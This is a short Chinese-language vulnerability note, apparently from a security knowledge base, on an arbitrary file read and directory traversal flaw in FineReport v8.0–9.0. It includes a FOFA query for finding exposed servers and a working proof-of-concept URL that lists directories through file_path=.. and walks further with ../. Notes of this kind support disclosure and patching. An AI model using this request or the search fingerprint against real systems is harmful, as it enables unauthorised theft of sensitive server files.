menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 帆软报表 v8.0 - 9.0 存在任意文件读取漏洞 chevron_right 帆软报表 v8.0 - 9.0 存在任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    帆软报表 v8.0 - 9.0 存在任意文件读取漏洞.md
    774 B / 2021-07-15 20:13:38
        ## 帆软报表 v8.0 - 9.0 存在任意文件读取漏洞

## 漏洞描述

FineReport v8.0 - 9.0 任意文件读取漏洞,攻击者可以通过此漏洞获取敏感信息,为下一步攻击做准备。

## 漏洞影响

> FineReport v8.0
>
> FineReport v9.0

## FOFA

> body="isSupportForgetPwd"

## POC

登录界面如下:

 ![1](/resource/帆软报表/1.jpg)

 

 

查看当前目录路径

```
http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true
```

 ![2](/resource/帆软报表/2.jpg)

进一步读取此目录下的其他文件

![3](/resource/帆软报表/3.jpg)

可以通过../对目录进行遍历,从而获取自己想要的信息

![4](/resource/帆软报表/4.jpg)
    links
    file_download